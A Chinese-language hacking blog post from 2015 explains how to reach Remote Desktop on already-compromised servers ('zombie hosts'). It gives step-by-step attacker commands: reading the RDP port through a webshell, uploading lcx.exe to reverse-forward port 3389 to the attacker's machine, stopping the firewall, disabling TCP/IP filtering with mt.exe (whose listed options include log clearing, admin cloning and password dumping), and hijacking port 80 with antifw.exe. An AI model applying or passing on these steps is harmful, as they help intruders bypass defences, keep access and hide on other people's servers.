WEB滲透之對于開了3389遠程連接不上的總結
責編:admin |2015-02-10 16:17:56對于開了3389,連接不上,有幾個方面的原因,我來總結下,哇咔咔,這幾天提好幾臺服務器都TM這樣,分析下,
原因1、遠程桌面端口被更改。2、對方服務器處于內網。 3、防火墻攔截。4、TCP/IP安全限制。
好了,知道原因了,我們來一個一個思考解決方法(部分引用):
遠程桌面端口被更改解決方法:
現在一般的asp大馬都有探測服務器的功能,在權限還行的情況下都可以直接查看遠程(Terminal Service)端口,或者可以查看注冊表也可以得到遠程桌面端口,asp權限不行,在支持aspx的時候就換aspx查看注冊表。
對方服務器處于內網解決方法:
這種情況我們可以使用lcx做端口轉發,不知道的或者沒有的就百度“lcx.exe下載”,我就不提供下載了。
使用方法:
1.上傳lcx.exe到目標服務器可執行目錄
2.本地主機啟動lcx.exe監聽,命令:
lcx.exe -listen 1988 4567 // 監聽1988端口并轉發到4567端口
在目標主機運行:
格式為:
lcx.exe -slave 你的IP 你監聽的端口 肉機IP 要轉發的目標主機端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
3.本地鏈接:127.0.0.1:4567
OK,有點小麻煩,不過還是很管用的,要是你也是內網,你就做下端口映射就好了,映射到轉發回來的端口,哇咔咔。
4、防火墻攔截解決辦法:
一般還是先試試端口轉發,還是利用LCX,
使用方法:
lcx.exe -slave 你的IP 你監聽的端口 肉機IP 要轉發的目標主機端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
lcx.exe -listen 1988 4567
然后本地連接:127.0.0.1:4567 就搞定了。
如果還不行。。要是web是SYSTEM權限,直接停掉防火墻服務就沒問題了。
5、TCP/IP安全策略限制。
這個解決方法就有點多了,可以使用MT.EXE來關閉策略,
使用方法:
1.上傳mt.exe到目標服務器可執行目錄
2.執行命令:mt.exe -filter off
這樣就關閉了TCP/IP限制了
選項 :
-filter —更改 TCP/IP 過濾器的開頭狀態
-addport —添加端口到過濾器的允許列表
-setport —設置端口作為過濾器的允許列表
-nicinfo —列出 TCP/IP 界面信息
-pslist —列出活動進程
-pskill —殺毒指定進程
-dlllist —列出指定進程的 DLL
-sysinfo —列出系統信息
-shutdown —關閉系統
-reboot —重啟系統
-poweroff —關閉電源
-logoff —注銷當前用戶會話
-chkts —檢查終端服務信息
-setupts —安裝終端服務
-remts —卸載終端服務
-chgtsp —重置終端服務端口
-clog —清除系統日志
-enumsrv —列出所有服務
-querysrv —列出指定服務的詳細信息
-instsrv —安裝一個服務
-cfgsrv —更改服務配置
-remsrv —卸載指定服務
-startsrv —啟動指定服務
-stopsrv —停止指定服務
-netget —從 http/ftp 下載
-redirect —端口重定向
-chkuser —列出所有賬戶、sid 和 anti 克隆
-clone —克隆 admin 到目標
-never —設置賬戶看上去從未登錄
-killuser —刪除賬戶,甚至是 “guest” 也可刪除
-su —以 Local_System 權限運行進程
-findpass —顯示所有已登錄用戶的口令
-netstat —列出 TCP 連接
-killtcp —殺死 TCP 連接
-psport —映射端口到進程
-touch —設置文件日期和時間到指定值
-secdel —安全擦除文件或目錄占用的空間
-regshell —進入一個控制臺注冊表編輯器
-chkdll —檢測 gina dll 后門
上面只是一種方法,再說一種好用的方法吧,成功率灰常高,哇咔咔。
使用antifw.exe這個工具,
使用方法:
在cmd下輸入
antifw -s 運行程序 停止iis將3389改為80
antifw -l 關閉程序。恢復iis
連接的時候直接連接他的80端口就OK了,成功率比較高。但是這樣他網站就訪問不了。。。
沒事,上去了我們趕緊分析原因,排除萬難,把限制去掉,再給他還原80端口,哇咔咔。。。